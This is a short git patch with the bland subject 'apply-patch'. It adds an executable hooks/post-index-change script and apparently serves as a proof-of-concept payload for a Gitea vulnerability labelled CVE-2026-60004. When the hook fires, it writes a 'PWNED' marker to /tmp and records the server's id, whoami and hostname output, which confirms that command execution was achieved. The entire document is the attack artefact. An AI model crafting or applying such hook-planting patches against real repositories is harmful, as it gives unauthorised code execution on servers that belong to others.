From db6baf87ee8c9970a1524e1a19b0bbf65712845c Mon Sep 17 00:00:00 2001 From: dev81266 Date: Wed, 29 Jul 2026 07:58:58 +0800 Subject: [PATCH] apply-patch --- hooks/post-index-change | 6 ++++++ 1 file changed, 6 insertions(+) create mode 100755 hooks/post-index-change diff --git a/hooks/post-index-change b/hooks/post-index-change new file mode 100755 index 0000000..6c43288 --- /dev/null +++ b/hooks/post-index-change @@ -0,0 +1,6 @@ +#!/bin/sh + +echo PWNED_by_CVE202660004 > /tmp/gitea_pwn_$(date +%s).txt +id >> /tmp/gitea_pwn.txt +whoami >> /tmp/gitea_pwn.txt +hostname >> /tmp/gitea_pwn.txt